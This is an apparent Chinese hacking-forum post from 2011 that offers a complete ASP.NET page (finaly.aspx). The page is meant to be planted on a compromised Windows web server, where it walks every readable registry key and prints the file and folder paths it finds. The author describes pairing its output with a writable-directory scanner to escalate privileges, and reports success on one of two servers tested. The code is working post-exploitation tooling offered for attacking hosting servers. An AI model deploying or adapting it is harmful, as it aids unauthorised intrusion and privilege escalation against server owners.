by:小手冰凉ing
注意:只是辅助工具而已
原理是自动读所有可读的注册表,并自动找注册表里面存在的路径信息,然后全部echo..
然后呢,你懂的,结合啊d的目录检测,2基友一搭配,基情无限!上图…
然后wt,这样一个星外就…
本工具能够找到一些目录,然后再配合可写目录扫描工具查找可写目录
测试两台 找到可写提权成功一台 服务器有限无法进一步测试
|
finaly.aspx:
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Collections" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ import Namespace="System.Collections.Generic"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<%
Stack sack = new Stack();//测试成功,比较卡
List<String> list = new List<String>();
sack.Push(Registry.ClassesRoot);
sack.Push(Registry.CurrentConfig);
sack.Push(Registry.CurrentUser);
sack.Push(Registry.LocalMachine);
sack.Push(Registry.Users);
while (sack.Count > 0)
{
RegistryKey Hklm = (RegistryKey)sack.Pop();
if (Hklm != null)
{
try
{
string[] names = Hklm.GetValueNames();
foreach (string name in names)
{
try
{
string str = Hklm.GetValue(name).ToString().ToLower();
if (str.IndexOf(":\\") != -1 && str.IndexOf("c:\\program files") == -1 && str.IndexOf("c:\\windows") == -1)
{
Regex regImg = new Regex("[a-z|A-Z]{1}:\\\\[a-z|A-Z| |0-9|\u4e00-\u9fa5|\\~|\\\\|_|{|}|\\.]*");
MatchCollection matches = regImg.Matches(str);
if (matches.Count > 0)
{
string temp = "";
foreach (Match match in matches)
{
temp = match.Value;
if (!temp.EndsWith("\\"))
{
if (list.IndexOf(temp) == -1)
{
Response.Write(temp + "<br/>");
list.Add(temp);
}
}
else
temp = temp.Substring(0, temp.LastIndexOf("\\"));
while (temp.IndexOf("\\") != -1)
{
if (list.IndexOf(temp + "\\") == -1)
{
Response.Write(temp + "\\<br/>");
list.Add(temp + "\\");
}
temp = temp.Substring(0, temp.LastIndexOf("\\"));
}
}
}
}
}
catch (Exception se) { }
}
}
catch (Exception ee) { }
try
{
string[] keys = Hklm.GetSubKeyNames();
foreach (string key in keys)
{
try
{
sack.Push(Hklm.OpenSubKey(key));
}
catch (System.Security.SecurityException sse) { }
}
}
catch (Exception ee) { }
}
}
%>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html> |
dmjhs经常教导我在注册表里找文件路径,我也经常按他说的做,但感觉实在费事。就产生了这个想法,遍历所有有读权限的注册表位置,查找文件路径。但是我不会asp.net,只能突击了,由于只用了一个晚上一边学习一边写程序,所以代码写的比较烂,而且比较简单。直接访问工具就能得到所有注册表中的目录和文件。但是假如我们在注册表发现c:\peo\asj.sd 那这个是文件还是文件夹呢?本着宁可错杀一千,不能错过一个的原则,我将他做了如下处理:当做两项c:\peo\asj.sd(文件)和c:\peo\asj.sd\(文件夹)
用法:直接访问 得到所有路径 再用可写目录扫描工具(论坛上有)扫描
程序很垃圾,正则不完善,能力有限无法改进,只为各位编程大牛提供思路,感谢dmjhs的指导以及测试。
文章作者
Nuclear'Atk
上次更新
2011-09-14
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。